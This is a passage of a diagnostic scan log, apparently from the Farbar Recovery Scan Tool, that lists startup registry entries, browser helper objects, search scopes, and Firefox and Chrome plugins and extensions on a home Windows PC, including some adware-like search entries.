(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-04] (Intel Corporation)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-05] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-03-24] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [YouCam Service6] => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [500696 2013-11-26] (CyberLink Corp.)
HKLM-x32\...\Run: [Aeria Ignite] => C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe [1925656 2013-06-07] (Aeria Games & Entertainment)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [AdobeCEPServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CEPServiceManager4\CEPServiceManager.exe [1039248 2013-03-13] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [4085896 2014-08-12] (AVAST Software)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKLM-x32\...\Run: [VNPT-CA CL Token Manager V1_std] => C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe [139312 2013-10-30] (VNPT-CA)
HKLM\...\RunOnce: [*WerKernelReporting] => C:\Windows\SYSTEM32\WerFault.exe [415232 2009-07-14] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [OfficeSyncProcess] => C:\Program Files\Microsoft Office\Office14\MSOSYNC.EXE [911040 2013-04-22] (Microsoft Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [HP Photosmart 6510 series (NET)] => C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe [2672488 2011-05-25] (Hewlett-Packard Co.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [Tiny download manager] => C:\Users\Papa\AppData\Local\DM\TinyDM.exe [288728 2014-02-16] (http://www.tinydm.com/)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3604048 2013-06-20] (Tonec Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [Avast-Browser-Cleanup] => C:\Program Files\Alwil Software\Avast5\BrowserCleanup.exe [2564088 2014-08-19] (AVAST Software)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\RunOnce: [Avast-Browser-Cleanup] => C:\Program Files\Alwil Software\Avast5\BrowserCleanup.exe [2564088 2014-08-19] (AVAST Software)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\RunOnce: [Report] => \AdwCleaner\AdwCleaner[S0].txt [67076 2014-08-12] ()
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\MountPoints2: E - E:\setup_vmc_lite.exe /checkApplicationPresence
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\MountPoints2: {bc1d265d-fc35-11e3-b3d0-806e6f6e6963} - F:\autorun.exe
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\MountPoints2: {f83808f1-fc17-11e3-a4b2-60eb69562f4e} - F:\autorun.exe
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [DAEMON Tools Lite] => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-07-02] (Google Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [msnmsgr] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe [4272624 2013-02-05] (Microsoft Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [CocCoc Update] => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe [142200 2014-01-20] (Itim Technologies Co., Ltd.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3604048 2013-06-20] (Tonec Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [NhacCuaTui] => C:\Program Files (x86)\NhacCuaTui\1.0.6.27\NhacCuaTui.exe [2033016 2013-11-22] (NCT Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [Akamai NetSession Interface] => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [iFunBox Price Watch] => C:\Program Files (x86)\iFunbox 2013\iFunBox2013.exe [5474816 2013-09-27] (i-Funbox.com)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\MountPoints2: {d37c59bb-7531-11e3-9803-60eb69562f4e} - D:\Autorun.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (No File)
Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft SharePoint Workspace.lnk
ShortcutTarget: Microsoft SharePoint Workspace.lnk -> C:\Program Files\Microsoft Office\Office14\GROOVE.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers:  SkyDrive1 -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers:  SkyDrive2 -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers:  SkyDrive3 -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: .webnavi -> {71748560-AA80-4469-9C1D-29A66233974C} => C:\Users\Papa\AppData\Roaming\webnavi\nvi64.dll No File
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShA64.dll (AVAST Software)
ShellIconOverlayIdentifiers: egisPSDP -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\psdprotect.dll (Egis Technology Inc.)
ShellIconOverlayIdentifiers: IDM Shell Extension -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll (Tonec Inc.)
ShellIconOverlayIdentifiers-x32:  SkyDrive1 -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32:  SkyDrive2 -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32:  SkyDrive3 -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: .webnavi -> {71748560-AA80-4469-9C1D-29A66233974C} => C:\Users\Papa\AppData\Roaming\webnavi\nvi.dll No File
ShellIconOverlayIdentifiers-x32: egisPSDP -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x86\psdprotect.dll (Egis Technology Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.shb.com.vn/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.co...ng}&rlz=1I7ACAW
SearchScopes: HKLM-x32 - {E627DC4B-8C04-4234-A2D4-1D634EE01C41} URL = http://www.bigseekpr...q={searchTerms}
SearchScopes: HKCU - {391588CC-C239-46D5-90E3-05638F1D5DF5} URL = http://search.creati...q={searchTerms}
SearchScopes: HKCU - {4A720000-424D-40a9-A87E-3EBD3E7536CA} URL = http://search.passwo...m={searchTerms}
SearchScopes: HKCU - {57238BE3-743E-4BE5-9F23-6AE7B33571A8} URL = http://www.mysearchr...q={searchTerms}
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.co...1I7ACAW_deVN406
SearchScopes: HKCU - {E627DC4B-8C04-4234-A2D4-1D634EE01C41} URL = http://www.bigseekpr...q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll (Internet Download Manager, Tonec Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll (Internet Download Manager, Tonec Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Blog This in Windows Live -> {2adefb8e-b923-35e6-86e2-2b7841f5d6a4} -> C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
BHO-x32: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - @C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM-x32 - PasswordBox - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.aka...vex-2.2.5.7.cab
Handler: haufereader - No CLSID Value - 
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: haufereader - No CLSID Value - 
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{17D9B602-7FC4-4529-A557-E1456C40D5AF}: [NameServer]8.8.8.8,8.8.4.4
 
FireFox:
========
FF ProfilePath: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default
FF DefaultSearchEngine: Search
FF SearchEngineOrder.1: Search
FF SelectedSearchEngine: Google
FF Homepage: hxxp://www.n-tv.de/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_8_800_94.dll ()
FF Plugin: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_94.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1210150.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin-x32: @soe.sony.com/installer,version=1.0.3 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\Sony Online Entertainment\npsoe.dll ()
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Temp\Rar$EXa0.497\LienMinhHuyenThoai\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @unity3d.com/UnityPlayer,version=1.0 -> C:\Program Files (x86)\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin-x32: @zing.vn/ZingPlay-WebControl-1,version=1.0.1 -> C:\Program Files\VinaGame\ZingPlay\npWebActivater.dll (VNG Corp.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CCMSDK.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\cgpcfg.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CgpCore.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\confmgr.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctxlogging.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctxmui.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\icafile.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\icalogon.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npicaN.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPSWF32.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\sslsdk_b.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\TcpPServ.dll (Citrix Systems, Inc.)
FF SearchPlugin: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\passwordbox.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2012-06-06]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} [2011-11-15]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA} [2012-05-17]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-28]
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2012-02-22]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-06-09]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix
FF Extension: Mozilla hotfix - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix [2013-05-07]
FF HKCU\...\Firefox\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix
FF HKCU\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\PasswordBox\Firefox
FF Extension: PasswordBox - C:\Program Files (x86)\PasswordBox\Firefox [2013-09-10]
FF HKCU\...\Firefox\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5
FF Extension: IDM CC - C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5 [2013-09-15]
FF HKCU\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5
FF Extension: No Name - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected] []
 
Chrome: 
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://www.shb.com.vn/"
CHR Extension: (SearchNewTab) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\afddldeabjlloeiaejhkcihpbfjbcnca [2013-09-14]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde [2013-06-12]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp [2014-03-29]
CHR Extension: (IDM Integration) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm [2014-02-01]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc [2013-09-13]
CHR Extension: (Google Wallet) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-13]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-08-12]
